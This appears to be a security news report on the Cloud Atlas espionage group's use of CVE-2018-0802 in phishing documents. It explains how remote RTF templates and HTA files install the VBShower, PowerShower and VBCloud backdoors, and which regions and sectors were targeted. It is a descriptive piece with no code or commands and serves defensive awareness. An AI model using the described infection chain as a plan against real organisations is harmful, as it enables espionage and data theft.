Threat Actors Exploiting Microsoft Office Vulnerability for Malicious Code Execution
A sophisticated cyber-espionage group, Cloud Atlas, has been identified as exploiting a critical vulnerability in Microsoft Office to carry out targeted attacks against organizations in Eastern Europe and Central Asia. Active since 2014, this group has recently introduced an advanced toolset that enhances its capabilities to evade detection and infiltrate high-value targets.
Infection Vector and Attack Mechanism
Cloud Atlas primarily utilizes meticulously crafted phishing emails that contain malicious documents. These documents take advantage of a vulnerability in Microsoft Office’s formula editor, specifically tracked as CVE-2018-0802, to initiate a complex infection chain leading to the deployment of sophisticated backdoors. When a victim opens the infected document, it triggers the download of a remote template file in RTF format from an attacker-controlled server.
This RTF template exploits the formula editor vulnerability, which subsequently downloads and executes an HTML Application (HTA) file from the same command and control (C2) server. To minimize detection risks, Cloud Atlas imposes strict controls on malware distribution, allowing RTF and HTA file downloads only during specific time frames and from designated IP addresses within targeted regions.
Execution of Malicious Payloads
Once executed, the HTA file extracts and installs various components of the VBShower backdoor onto the victim's system. VBShower then proceeds to download another backdoor known as PowerShower. This infection method has shown remarkable consistency since its initial discovery in 2019, with only minor adjustments over time.
In a notable shift in tactics, Cloud Atlas has introduced a new backdoor called VBCloud, which replicates many functionalities associated with a separate DLL module. VBCloud can download and execute malicious plugins, communicate with cloud servers, and perform various system operations. First detected in August 2023, VBCloud has since undergone multiple variations to maintain its stealth.
The updated attack sequence now includes loading VBCloud via VBShower, which also downloads the PowerShower module. PowerShower is tasked with probing local networks for further infiltration opportunities, while VBCloud focuses on gathering system information and exfiltrating sensitive files.
Targeted Industries and Geographic Focus
Cloud Atlas has shown a particular interest in sectors such as aerospace, international economics, government agencies, and religious organizations. Their operations have impacted countries including Portugal, Romania, Turkey, Ukraine, Russia, Turkmenistan, Afghanistan, and Kyrgyzstan.
The group's continuous evolution and adoption of polymorphic malware techniques underscore the persistent challenges faced by cybersecurity professionals in detecting and mitigating advanced persistent threats.
Conclusion
As Cloud Atlas refines its tools and strategies, organizations within the affected regions must remain vigilant. Implementing robust security measures is essential to defend against these sophisticated cyber-espionage campaigns that exploit vulnerabilities in widely used software like Microsoft Office
.png){kind=icon}
.svg){kind=icon}
